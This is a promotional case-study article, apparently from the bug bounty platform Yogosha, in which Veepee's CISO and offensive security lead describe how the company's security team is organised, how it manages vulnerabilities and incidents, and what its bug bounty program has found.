Veepee’s CISO and Lead OffSec told us about the tight security of this e-commerce giant. Let’s take a look behind the scenes.
What is Veepee? If we had asked you, you would probably have told us about the famous flash sales platform, its flashy pink logo or your last pair of sneakers. And you would be right. We all know Veepee as a key player in the European digital commerce.
But there is a side of Veepee that is much less known. That of a group with a historical tech culture, coupled with a digital security that strives to remain exemplary. Behind the Veepee we all know, there is vpTech.
“vpTech, it’s the will to create a real tech community”
The vpTech community was born in 2016, from the merger of the different groups that compose Veepee today. It is a twofold entity: vpTech is the IS Department of the company, but also a brand identity on its own. Antonin Garcia, CISO at Veepee, explains:
“Before, Veepee was a company with a lot of providers, which had integrated many solutions. Then, 7 years ago, the decision was made to invest heavily in tech. To hire a lot of people, to create an internal cloud, to create a synergy and a common brand to group together the tech activities of Veepee… vpTech is the will to create a real tech company.”
With vpTech, Veepee has done what many other businesses have failed to achieve: integrate technology into the DNA of the company. The entity delivers solutions and tools to the rest of the group, both for the e-commerce platform and for the providers and client brands. Concretely, vpTech represents:
- more than 800 employees
- spread over 6 countries
- and using more than fifty technologies
Internalize developments to ensure ownership of the products’ security
By having its own in-house technology fleet, the company can be more agile and take ownership of its product security in a way that would otherwise be impossible. Antonin, the CISO, says:
“At Veepee, developers, SREs, architects, product owners are all in-house and are responsible for their products. So when you have a vulnerability, you don’t need to open a ticket with a provider or a system manager. We really have ownership from start to finish; of the code, the applications, the servers, everything.”
Veepee: one brand, many digital security challenges
Security is a major business issue for Veepee, whose e-commerce platform records 4.5 million unique visitors and 130K€ of orders every day. But the group’s attack surface is not limited to its public platform. Julien Reitzel is Lead Offensive Security at Veepee. He states:
“We have the e-commerce platform, but behind it there are many other tools. Internal, but also external tools for the brands that sell on Veepee. For example, we have a marketplace, and recently the Re-cycle service. So there are a number of activities and sites that are not intended for members but B2B oriented. All of this put together represents a fairly large attack surface.”
Antonin Garcia concurs:
“We are not only an e-commerce player. Our CEO often says that we do B2B2C, our core business is to help brands to sell their inventory by offering quality products to our members. So we have many partners with whom we discuss and exchange information. And obviously, with the e-commerce part, we face all the classic attacks as soon as we have an exposed IP. A vulnerability on a public exposure does not do any good.”
Digital security challenges are thus varied for the company, which has:
- a publicly exposed e-commerce platform;
- a fleet of 800 techs at vpTech working to deploy technology solutions for internal and external use;
- an ecosystem of partners and brands, a source of information exchange.
To address these challenges, Veepee has created its own internal security team within vpTech. A choice that is fully in line with the tech company’s internalization strategy. After all, you’re never better served than by yourself.
Veepee: an internal security team split into four divisions
The security team at vpTech is composed of a dozen people, organized into four units:
- InfoSec (Information Security), in charge of GRC (Governance, Risk and Compliance);
- the SOC (Security Operations Center), which deals with log management, alert and security incident management. In short, the detection of suspicious behavior internally;
- OffSec (Offensive Security), which manages the offensive part – pentests, vulnerabilities, red team, management of bug bounty programs;
- the Engineering division, with SREs that develop solutions and architecture projects, in addition to improving the infrastructure of services used in-house.
This breakdown of roles can be explained in large part by the vision of security held by Antonin, the group’s CISO:
“Before joining Veepee, I had a very governance and compliance oriented career. I was a QSA (Qualified Security Assessor), and I was doing PCI DSS compliance in banking environments, which were very process-oriented. Then I joined Veepee, with a totally different IT, almost that of a start-up.
We immediately tried to avoid being too policy- and governance-oriented, but rather to do something highly operational. Governance and standards can make you lose sight of the essence of security. If you hide too much behind policies and processes, you no longer know why you are doing them. You end up with things that are great on paper, but which are a mess in operational terms. […] I think that the biggest challenge for the CISO is to find the right balance between governance, defense, offense and day-to-day business operations.
For us, it started with defense. We created a SOC, we deployed our own servers, we centralize the logs… Then, we moved on to the offensive. Today, we are about ten people and it fits in the culture of vpTech. We don’t want to take on contractors to train people who will leave at the end of their mission. The idea is that the security is carried by knowledgeable people in-house.”
Incident management: “Being prepared is mainly about surrounding yourself with competent and responsible people”
We cannot stress this enough: effective security must be proactive from start to finish. If prevention and detection of incidents are essential, having a response plan is just as important. And here again, Veepee sets an example:
“Any company that is exposed on the Internet will suffer a few breaches in a year, it’s inevitable. But the important thing is not the breach, it’s the preparation. You have to be prepared in such a way that it is as limited as possible, and that your teams are as ready as possible to respond, but most importantly as quickly as possible.
At Veepee, we are lucky to have a great Incident Management team. They have developed all the tooling in place, the on-call methodology, and even little things like a Slack bot that helps open operational incidents. We can be very reactive, and activate people quickly.
If you start asking questions once the breach has happened, it’s a bit late… You have to implement traceability, and a lot of offensive security. But being prepared is mainly about surrounding yourself with competent and responsible people.”
– Antonin Garcia, CISO at Veepee
vpTech: thinking of security with multiple teams and technologies
vpTech has no less than 800 techs in 6 countries. The internalization of such a technological strike force is a real asset for the group. Nevertheless, the multiplication of teams and technologies comes with its share of challenges in terms of digital security. This is what Julien Reitzel, Lead of the Offensive Security team, explains:
“What you see as a customer, as a member, is the e-commerce website. But behind veepee.fr, there are a lot of teams that take care of the different pages. Some of them handle account creations and login, others the display of sales or payments. And there is not only the .fr site: Veepee is present in Spain, in Germany, in Italy…
So that’s a lot of different teams and technologies used, especially since not everyone has the same maturity. And there is always some legacy, and a Shadow IT part like in all companies, with people doing their own thing.”
Control through centralization and accountability
How do you ensure the proper security of the applications being produced when the techs outnumber the security team 80 to 1? A daunting challenge for the group’s CISO – but as he likes to say, “not even afraid!” Antonin thought deeply about it:
“At Veepee, the security team cannot check all publications of all applications. Why not? Because there are only a dozen of us and 800 people producing. We want agility, and we want to put code into production quickly. So we asked ourselves a lot of questions. How do we control? To interact with the devs?
The idea of security is that it should be as close as possible to the job, to the production phase. We’re not on a Change Management system, or a validation one. Everyone is autonomous, and we approach the relationship with the developers differently.
For example, we use DefectDojo, a really great open-source tool made by the OWASP. It standardizes all the inputs of the vulnerability tools. We managed to organize all our tests inside – pentest, red/purple team, bug bounty… Today, the collaboration with developers and SREs is mostly done through this tool.
When we find vulnerabilities, no matter where they come from, we add them to the tool and the products receive a summary email per month with a score. Teams are assessed on a level of maturity, and the idea is to gamify the whole thing a bit. Each product has a grade between A and E, we try to publish them and they include it in their dashboards.”
– Antonin Garcia, CISO
Raising security awareness among developers
It’s not enough to centralize, you also have to educate. At Veepee, security is also a matter of raising awareness among the tech professions. This is a subject that Julien takes to heart:
“The security team is part of vpTech, part of the IS Department. We are in the same community as the developers, but there are a lot of products and teams. The relationship we have with the devs and POs differs from one product to another. We are very close to certain teams, and it is inevitably more complicated with others who have a lower security culture. It is therefore essential to provide security training to developers. Originally, I even joined Veepee for that – before doing pentesting, I was a dev myself. […]
For instance, we organized CTFs (Capture The Flag) internally, with small security tests intended for the tech-savvy people. I remember a safe we put in our office. You had to send some instructions to open it. We put chocolates inside for the winner, it was fun. We had a lot of participations, and it got people interested.”
– Julien Reitzel, Lead OffSec
A few years ago, Veepee chose to launch a bug bounty program with Yogosha. In addition to its primary objectives of detecting vulnerabilities, the program had an unexpected effect internally. This new form of audit has sparked the curiosity of the developers, and reinforced their investment in the remediation of vulnerabilities identified by the Yogosha Strike Force hunters. Julien explains:
“I didn’t expect it, but we’ve noticed that vulnerabilities reported through bug bounty get more interest from teams.
Like everyone else, we conducted pentests with service providers, who delivered a nice PDF report at the end that we sent to the relevant teams. Some of them took it into account and made the corrections quickly. But with others, nothing had changed a year or two later, and we would discover the same vulnerabilities during new rounds of penetration testing.
We quickly understood that the bug bounty provided a new dimension. When we say that a vulnerability comes from bug bounty, they think, “ah, but that means anyone on the Internet can do that to my application! And on top of that, we had to pay someone for finding that particular vuln.“”
Antonin agrees: “Talking about bug bounty, it questions the tech and non-tech professions. They ask what it is, how it works. For me, that was a great win.”
Bug Bounty, a key element of Veepee’s offensive security
If today everything goes well, Antonin, the CISO, was not reassured at the idea of jumping into the bug bounty adventure:
“I had never done bug bounty before. At first it was a little scary, you think you’re going to allow guys to break in without being able to hide behind the law. Then it was complicated to defend it at the budget, when even I didn’t trust it. I didn’t know if we were going to burn the budget in 24h, 48h, two weeks… So I called a few CISO buddies around, who explained to me what they were doing.
In the end, we went straight to *.veepee.fr – not even afraid! What I found really nice is that we can manage our perimeters and invited hunters, so we can get more mature ourselves. We were able to start with very few hunters, and then increase as we went along. Being on a private bug bounty is also very comfortable. We can manage the community and the people, it’s easier.”
Today, things have changed. The anxiety of the beginning has disappeared, and the CISO of Veepee doesn’t regret his choice:
“I’m really happy with the Yogosha service, and especially with the support. For me, it is mandatory today to do bug bounty. You can’t ignore it, it would be like hiding from the world. I thought that we were going to get rid of the need to do pentesting, but no, it’s still necessary. Bug bounty has turned out to be a new tool, and one that is indispensable for me.”
The bug bounty is now fully integrated in the vulnerability detection strategy of the security team, in addition to other tests.
“We know how to do pentesting, and the applications that are very exposed for members, we know them. But bug bounty allows you to go after the blind spots, the small services that are not necessarily maintained or with less rigor.” explains Antonin.
A statement backed up by Julien, at the Offensive Security: “Thanks to Yogosha, we already learned about a number of perimeters, subdomains and servers exposed on the Internet that we hadn’t had a chance to look at before. It’s allowed us to cut off things that we weren’t necessarily aware of.“
A bug bounty managed in-house
As you may have understood, at vpTech they like to do things themselves. And the bug bounty is no exception to the rule. It is the Offensive Security team that takes care of the relationship with the hackers and the triage of the reports. A real plus according to Antonin: “Since they do pentesting, they have the necessary finesse to gauge vulnerabilities. They know how to qualify criticality, and engage in a dialogue if there is disagreement with a hunter.“
As for the relationship with the Yogosha Strike Force hunters, Antonin advocates discussion.
“We always remain very cordial. Security is a small world, and it can affect our public image. […] Anecdotally, we can get into a bit of a tussle with the hackers. The Yogosha KYC has been really interesting [editor’s note: all our hunters are ID verified]. We contact each other, we can have discussions. But what we’ve come to understand is that we’re all human. You have to take the time to discuss, to exchange and to understand the different opinions.
Disagreements usually come from the CVSS criticality score, which does not always reflect the real business impact of a vulnerability. This is the real difficulty of bug bounty, you have to know how to determine the real impact of a vulnerability, while recognizing the time spent on it by a hunter.”
“With bug bounty, we sometimes have hunters who go really deep.”
The bug bounty allows hunters to dig deep and over time, where other forms of audits such as penetration testing are time-bound. This different philosophy allows bug bounty to bring to light complex vulnerabilities that are difficult and time-consuming to identify. Veepee’s CISO confirms:
“We’ve done a lot of pentests, we always do some for compliance or to get back on critical applications. […] But with bug bounty, it’s different. You’re not waiting for a report, you’re waiting for a critical vulnerability. That’s the difference as well. And with Yogosha, criticals have almost always been relevant. It’s not the secure cookie or the poorly configured HSTS that you can get from a pentester that gets to the end of its 5 days, and has to make a report despite not having found much.”
– Antonin Garcia
Julien also testifies to the accuracy of the bug bounty, and of the reports submitted by the hackers of the Yogosha Strike Force.
“With penetration testing, the perimeter is clearly defined. If you find a vulnerability, you don’t necessarily go further. With bug bounty, we sometimes have hunters who go really deep. Some of them place real orders on the site, so they spend their money to find vulnerabilities behind. With external pentests, we’ve never seen that. […]
When we do a pentest, an XSS is often about displaying an alert box or session cookies, but it rarely goes further. With bug bounty, we had XSS stored from a frontend that allowed us to do things on the backoffice.
This kind of thing also allows us to raise awareness among devs. Knowing that you can take a screenshot of a backoffice that is normally not accessible from the Internet, or take control of the browser and potentially dump a database via an XSS, it adds impact and interest.”
– Julien Reitzel, Lead OffSec at Veepee.
Julien also confides that critical reports submitted by hunters are so often relevant that they recently began generating 24/7 alerts at vpTech. “We decided this only for criticals, we don’t want to be woken up at any time for a medium!” We apologize in advance to all vpTech developers who will have to wake up because of our hunters.
Now you know what’s behind the pink butterfly logo. The next time you order on Veepee, you’ll know that on the other side of the screen, there’s Antonin, Julien and the rest of the vpTech team ready to wake up in the middle of the night to make sure the service is secure.
Curious about bug bounty? Learn more about Yogosha’s solutions.